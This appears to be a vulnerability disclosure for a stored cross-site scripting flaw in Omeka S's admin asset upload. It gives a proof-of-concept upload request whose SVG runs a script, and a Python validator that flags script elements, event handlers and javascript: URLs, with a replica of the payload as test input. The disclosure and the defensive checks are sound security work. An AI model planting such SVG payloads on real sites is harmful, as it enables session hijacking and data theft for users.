Stored XSS via SVG Upload in omeka/omeka-s
Reported on Jul 16th 2023
Description
By uploading an SVG file containing JavaScript through the file upload function on the administrator screen, it is possible to execute arbitrary script in the browser of any user who accesses the stored file.
Proof of Concept
Log in to the administrator screen, open the Assets page, and upload the SVG file shown in the request below.
Request
POST /admin/asset/add HTTP/1.1
...
-----------------------------32482956685473744651320483298
Content-Disposition: form-data; name="file"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
-----------------------------32482956685473744651320483298
...
Execution Result
http://localhost/files/asset/d6dbbeb510abf7a3498c0b8dbdbb61738a91ab06.svg
PoC Video
https://drive.google.com/file/d/1egSGIfDD9ZTitGCb9-bLVZmPdMqUPPyK/view?usp=sharing
Measures
Always validate uploaded files, restrict the content types that may be uploaded, and sanitize their content properly.
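As an added example (not code from the report or from Omeka S), a Python upload check that applies these measures to SVG files: it rejects an SVG carrying script elements, event-handler attributes or javascript: URLs, and it builds response headers that serve a stored SVG as an inert download. It assumes the whole upload is in memory and that the caller passes the stored (hash) file name, not the user-supplied one; the payload embedded at the bottom is a constructed replica of the one in the report.

```python
import xml.etree.ElementTree as ET

# Elements that let an SVG run script or embed a foreign document.
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}
# Attributes (namespace stripped) whose value can carry a javascript: URL.
URL_ATTRIBUTES = {"href", "src"}

def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]

def svg_findings(data: bytes) -> list[str]:
    """Return why an uploaded SVG must be rejected; an empty list means clean.
    Assumes the whole upload is in memory. Stdlib expat does not fetch external
    DTDs, but untrusted XML should really go through a hardened parser (defusedxml)."""
    findings = []
    if b"<!ENTITY" in data:
        findings.append("DOCTYPE declares entities")
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"active element <{tag}>")
        for attr, value in elem.attrib.items():
            name = _local(attr)
            if name.lower().startswith("on"):
                findings.append(f"event handler {name} on <{tag}>")
            elif name in URL_ATTRIBUTES and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: URL in {name} on <{tag}>")
    return findings

def inert_asset_headers(filename: str) -> dict[str, str]:
    """Headers for serving a stored SVG as a download with script forbidden, so a
    file that slipped past validation still cannot run in the site's origin."""
    return {
        "Content-Type": "image/svg+xml",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{filename}"',
        "Content-Security-Policy": "sandbox; script-src 'none'",
    }

# Constructed replica of the report's payload (not the original upload bytes).
POC_SVG = b"""<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert(document.domain);</script>
</svg>"""
```

Run `svg_findings(POC_SVG)` on the replica payload and the upload is refused with "active element <script>"; a plain shape-only SVG yields no findings.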
Impact
Stored XSS vulnerabilities can lead to data theft, account compromise, and the distribution of malware.
Attackers can inject malicious scripts into a website, allowing them to steal sensitive information or hijack user sessions.
Additionally, stored XSS can result in website defacement and content manipulation, causing reputational damage.
It can also be used as a platform for launching phishing attacks, tricking users into revealing their credentials or sensitive data.
Thank you for reviewing and approving my report. I will continue to wait for requests for fixes and CVEs.
@zerocrates Thanks for the fix and pull merge. Could you please submit a corrected mark and CVE assignment request?